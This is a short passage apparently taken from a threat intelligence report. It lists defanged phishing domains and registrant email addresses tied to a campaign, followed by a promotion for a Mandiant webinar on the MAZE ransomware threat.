hilfe-center-internetag[.]icu

trackweb-canadapost[.]icu

Sender Domain Registrant Addresses

abusereceive@hitler.rocks

gladkoff1991@yandex.ru

Mandiant Threat Intelligence will host an exclusive webinar on Thursday, May 21, 2020, at 8 a.m. PT / 11 a.m. ET to provide updated insight and information into the MAZE ransomware threat, and to answer questions from attendees. Register today to reserve your spot.

Follow me for more information.

X